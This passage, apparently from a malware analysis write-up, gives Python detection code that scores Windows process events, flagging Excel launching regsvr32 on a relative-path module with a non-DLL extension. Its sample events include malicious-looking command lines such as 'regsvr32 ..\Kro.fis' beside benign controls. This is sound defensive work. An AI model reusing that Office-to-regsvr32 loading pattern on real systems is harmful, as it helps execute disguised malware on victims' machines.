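# benign controls (an installer registering a real DLL, and Excel's print helper).
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 ..\Kro.fis"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 ..\Kro.fis1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 ..\Kro.fis2"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\component.dll"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]


def split_cmdline(cmd):
    """Split a Windows command line on whitespace, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def regsvr32_module(args):
    """Return the module argument of a regsvr32 command line: the first token after the
    program name that is not a /switch or -switch, or None if there is none."""
    for a in args[1:]:
        if not a.startswith(("/", "-")):
            return a
    return None


def evaluate(event):
    """Score one process-creation event; every matched condition adds one reason."""
    parent = PureWindowsPath(event["ParentImage"]).name.lower()
    image = PureWindowsPath(event["Image"]).name.lower()
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if image == "regsvr32.exe":
        module = regsvr32_module(split_cmdline(event["CommandLine"]))
        if module:
            ext = PureWindowsPath(module).suffix.lower()
            if ext not in COM_MODULE_EXT:
                reasons.append(f"module extension {ext or '(none)'} is not a COM server extension")
            if module.startswith((".\\", "..\\")):
                reasons.append("module is a relative path resolved against the parent's working directory")
    return len(reasons), reasons


def alert(events, threshold=2):
    """Return the events whose score reaches the threshold, with their reasons."""
    hits = []
    for e in events:
        score, reasons = evaluate(e)
        if score >= threshold:
            hits.append({"CommandLine": e["CommandLine"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in alert(EVENTS):
        print(hit["score"], hit["CommandLine"], "|", "; ".join(hit["reasons"]))
```

The parent/child pair on its own is noisy in environments where add-ins or installers run from Office, which is why the threshold is 2: the report's launches score 3 (Office parent, .fis extension, relative path), while the msiexec-driven registration of a .dll and the splwow64.exe child both score 0.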

                Disassembly

                Code Analysis
